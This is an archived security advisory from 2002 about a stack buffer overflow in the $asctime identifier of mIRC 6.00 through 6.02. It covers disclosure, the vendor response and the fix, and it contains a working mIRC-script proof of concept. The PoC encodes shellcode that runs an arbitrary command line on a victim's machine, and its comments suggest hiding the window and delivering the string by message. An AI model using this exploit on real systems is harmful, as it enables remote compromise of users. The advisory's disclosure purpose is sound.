what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

adv-002-mirc.htm

adv-002-mirc.htm
Posted Aug 30, 2002
Authored by James Martin | Site uuuppz.com

Many scripts installed in mIRC below version 6.03 allow remote compromise if they use the $asctime identifier, which is used to format unix time stamps. Includes proof of concept code which causes mIRC to execute a command line on any supported OS. Most users have not yet upgraded.

tags | exploit, remote, proof of concept
systems | unix
SHA-256 | 7bbc56e28d283a43eccbc8e827589188437b85d0ee6f7ebe44afd3e5cf94b646

adv-002-mirc.htm

Change Mirror Download

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Research - uuuppz.com (security/mIRC $asctime overflow)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="http://www.uuuppz.com/uuuppz.css" type="text/css">
<script language="JavaScript">
<!--
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.0
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && document.getElementById) x=document.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
</head>

<body bgcolor="#FFFFFF" text="#000000" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" onLoad="MM_preloadImages('../images/intro_on.jpg','../images/cons_on.jpg','../images/res_on.jpg','../images/cv_on.jpg','../images/cred_on.jpg')" link="#000000" vlink="#999999" alink="#666666">
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="100%">
<tr>
<td valign="top" align="center"> <br>
<table width="760" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td rowspan="2" valign="top" width="260">
<table width="260" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="../images/top.jpg" width="260" height="216" alt="uuuppz Logo"></td>
</tr>
<tr>
<td><a href="../index.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Intro Link','','../images/intro_on.jpg',1)"><img name="Intro Link" border="0" src="../images/intro_off.jpg" width="260" height="22" alt="Introduction"></a></td>
</tr>
<tr>
<td><a href="../consult/consulting.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Consulting Link','','../images/cons_on.jpg',1)"><img name="Consulting Link" border="0" src="../images/cons_off.jpg" width="260" height="21" alt="Consulting"></a></td>
</tr>
<tr>
<td><a href="../research/research.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Research Link','','../images/res_on.jpg',1)"><img name="Research Link" border="0" src="../images/res_off.jpg" width="260" height="22" alt="Research"></a></td>
</tr>
<tr>
<td><a href="../cv.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('CV Link','','../images/cv_on.jpg',1)"><img name="CV Link" border="0" src="../images/cv_off.jpg" width="260" height="22" alt="Curriculum Vitae"></a></td>
</tr>
<tr>
<td><a href="../credits.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Credits Link','','../images/cred_on.jpg',1)"><img name="Credits Link" border="0" src="../images/cred_off.jpg" width="260" height="22" alt="Credits"></a></td>
</tr>
<tr>
<td><img src="../images/bot.jpg" width="260" height="7" alt="spacer"></td>
</tr>
</table>
</td>
<td width="600" height="14"></td>
</tr>
<tr>
<td width="500" valign="top">
<table width="500" border="0" cellspacing="1" cellpadding="0" align="center" bgcolor="#000000">
<tr>
<td bgcolor="#FFFFFF">
<table width="500" border="0" cellspacing="0" cellpadding="0" height="300">
<tr bgcolor="#666666">
<td height="1" colspan="4"></td>
</tr>
<tr>
<td rowspan="3" width="1" bgcolor="#666666"></td>
<td height="1" colspan="3" bgcolor="#999999"></td>
</tr>
<tr>
<td width="1" rowspan="2" bgcolor="#999999"></td>
<td height="1" bgcolor="#CCCCCC" colspan="2"></td>
</tr>
<tr>
<td width="1" bgcolor="#CCCCCC"></td>
<td width="497" valign="top">
<blockquote>
<p><br>
<span class="title">Research</span> <span class="content">::
</span> <span class="fotter"><a href="research.htm">Summary</a></span>
<span class="content"> :: </span> <span class="fotter"><a href="irc3.htm">IRC3</a></span>
<span class="content">:: </span> <span class="fotter"><a href="utils.htm">Utilities</a></span>
<span class="content">:: </span> <span class="fotter">Security</span><br>
</p>

<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>

<td width="13%"><span class="title">Security </span></td>
<td width="2%"><span class="content">::</span></td>

<td width="85%"><span class="fotter"> <a href="adv-001-mirc.htm">Advisory
001 - mIRC Current Nickname overflow</a></span></td>
</tr>
<tr>

<td width="13%">&nbsp;</td>

<td width="2%"><span class="content">::</span></td>

<td width="85%" class="fotter">Advisory 002 - mIRC
$asctime overflow</td>
</tr>
</table>

<p class="title">Advisory 002 - mIRC $asctime overflow</p>
<span class="content"><b>Discovery</b><br>
Originally discovered Phrizer (DalNET #KORP), researched and documented by James Martin (aka uuuppz).

</span>
<p> <span class="content"><b>Vulnerable</b><br>
mIRC V6.00, V6.01, V6.02.
</span>
<p> <span class="content"><b>Impact</b><br>
Low to high, a vanilla installation of mIRC does not contain any attack vector to allow a remote compromise. However many scripts introduce an attack vector allowing arbitrary code execution through exploitation of this flaw.
</span>

<p><span class="content"><b>Vendor Response</b><br>
Vendor was informed on the 30/7/2002, along with being provided the proof of concept code. mIRC 6.03 was released on the 16/08/02 which includes a fix for this issue. No response was sent to me. It is worth noting that the vendor has not made any effort to inform its userbase of this flaw or the flaw in versions prior to 6.0 which was released earlier this year. As a result a large number of users have not upgraded, of course its difficult to make all users upgrade but vendor recognition is a big factor.<p>

Using a rather rough method I performed mass CTCP VERSION'S on several major channels, located on a number of networks. Around 30% of users seem to still be running mIRC 5.91 or lower. About 60% are using mIRC 6.00-6.02. <p>

A number of major scripts currently advise users not to upgrade to mIRC 6.00 or later as they do not work on the new version. Hence users of these scripts are not being encouraged to upgrade. Vendor acknowledgement of the flaws in my opinion would help persuade the maintainers of these scripts to take more aggressive action.<p>

</span>
<p> <span class="content"><b>Solution</b><br>
Download mIRC 6.03 from <a href="http://www.mirc.com" tppabs="http://www.mirc.com">http://www.mirc.com</a><br>
<p> <span class="content"><b>Description</b><br>
mIRC provides scripting capabilities to allow extension of the client. A flaw exists in the $asctime identifier, which is used to format Unix style time stamps. Passing a string of sufficient length to $asctime will cause a buffer overflow on the stack. This allows the execution of byte code through calling $asctime with a carefully constructed string.<p>

The default script included with mIRC does not call $asctime at any point. However the majority of major scripts available for download call $asctime to decode data provided by the irc server. Many scripts call $asctime on data provided from other remote sources. The exploitation of this flaw therefore depends on the script installed by the victim.
</span>
<p> <span class="content"><b>Details</b><br>$asctime can be called in four forms, depending on the number and type of parameters passed:
<ul><li>No parameters eg "//echo 1 $asctime hello!", this formats the current time as mIRC wishes.</li>
<li>With a time format only eg "//echo 1 $asctime(hh:mm) hello!", this formats the current time using the format specified.</li>
<li>With a time stamp only eg "//echo 1 $asctime(10203234) hello!", this formats the time stamp specified as mIRC wishes.</li>
<li>With both a time stamp and a time format eg "//echo 1 $asctime(1020334,hh:mm)", this formats the specified timestamp as specified by the format string.</li>
</ul>
The format parameter is where the overflow occurs. If only one parameter is specified mIRC will treat it as a timestamp (as per form 3) if it only contains numeric characters, otherwise the parameter will be treated as a time format. Vulnerable scripts contain code similar too "//echo 1 uuuppz is idle since $asctime($4)", where $4 is a taken directly from the irc server or some other remote source. <p>
If the string passed as the format specifier is longer than 388bytes the return address on the stack will be overwritten. There are a number of special characters that cannot be used in the string, the ascii codes for this are [72,84,90,100,104,109,110,115,116,121,122]. Other characters may not be possible to use depending on the circumstances.

</span>
<p> <span class="content"><b>Exploit</b><br>

Below is sample mIRC script code that creates a string that causes $asctime to executed a command line. Parameters may be given. The code functions on all vulnerable versions of mIRC and all supported operating systems.<p>

<code>
<br>; Proof of concept Code for asctime exploit
<br>; Author: James Martin
<br>; Website: http://www.uuuppz.com
<br>; Email: me@uuuppz.com
<br>;
<br>; Usage:
<br>; /asctime_poc notepad c:\autoexec.nat
<br>; /asctime_poc command.com /c echo Your have been rooted > c:\rooted.txt
<br>; etc :)
<br>;
<br>;
<br>/asctime_poc {
<br> ; Set Show State
<br> ;
<br> ; Valid Values:
<br> ; 1 - Show Normal (This will break a ctcp request)
<br> ; 2 - Minimise (If your being evil... ;))
<br> ; 3 - Maximise
<br> set %showstate 2
<p>
; Build Coded Command String
<br> set %command $1-
<br> set %count 1
<br> unset %codedcommand
<br> :loop
<br> set %codedcommand %codedcommand $+ $chr($calc(128+$asc($mid(%command, %count, 1))))
<br> set %count $calc( %count + 1)
<br> if %count <= $len(%command) goto loop

<p> ; Shell Code to Execute
<br> ;
<br> ; Detects mirc version, decodes the command string then calls winexec
<br> set %shellcode $chr(184) $+ PPP $+ $chr(255) $+ $chr(193) $+ $chr(224) $+ $chr(8) $+ $chr(193) $+ $chr(232) $+ $chr(8) $+ f $+ $chr(139) $+ $chr(24) $+ f $+ $chr(129) $+ $chr(251) $+ $chr(220) $+ qu $+ $chr(7) $+ $chr(184) $+ $chr(250) $+ $chr(253) $+ $chr(5) $+ $chr(255) $+ $chr(235) $+ $chr(19) $+ f $+ $chr(129) $+ $chr(251) $+ $str($chr(255),2) $+ u $+ $chr(7) $+ $chr(184) $+ $chr(190) $+ $chr(187) $+ $chr(4) $+ $chr(255) $+ $chr(235) $+ $chr(5) $+ $chr(184) $+ $chr(210) $+ $chr(129) $+ $chr(4) $+ $chr(255) $+ 5PPP $+ $chr(255) $+ $chr(235) $+ $chr(30) $+ Yj $+ $chr( %showstate ) $+ QIA $+ $chr(128) $+ 9 $+ $chr(255) $+ u $+ $chr(2) $+ $chr(235) $+ $chr(5) $+ $chr(128) $+ 1 $+ $chr(128) $+ $chr(235) $+ $chr(243) $+ $chr(128) $+ 1 $+ $chr(255) $+ $chr(255) $+ $chr(208) $+ ]]] $+ $chr(139) $+ $chr(229) $+ ] $+ $chr(195) $+ $chr(232) $+ $chr(221) $+ $str($chr(255),3)

<p> ; Build Exploit String
<br> set %exploitstring %shellcode $+ %codedcommand $+ $chr(255) $+ $str(a, $calc(300-2-$len(%command))) $+ q $+ $chr(17) $+ $chr(64)

<p> ; Run exploit string
<br> ;
<br> ; In the real world it would be more like
<br> ; /msg muppet weirdcommand %exploitstring
<br> echo 1 $asctime(%exploitstring)
<br>}
<br></codE>
</span>
</blockquote>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF" height="18">
<table width="500" border="0" cellspacing="0" cellpadding="0" height="18">
<tr>
<td bgcolor="#666666" width="1"></td>
<td bgcolor="#999999" width="1"></td>
<td bgcolor="#CCCCCC" width="1"></td>
<td width="497">
<div align="center"><span class="content"><b class="fotter">Hosting
provided by <a
href="http://www.biznet-solutions.com/" target="_blank">BizNet Solutions</a>.
Powered by <a href="http://www.debian.org/" target="_blank">Debian.</a></b></span></div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<p>&nbsp;</p></td>
</tr>
</table>
</body>
</html>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close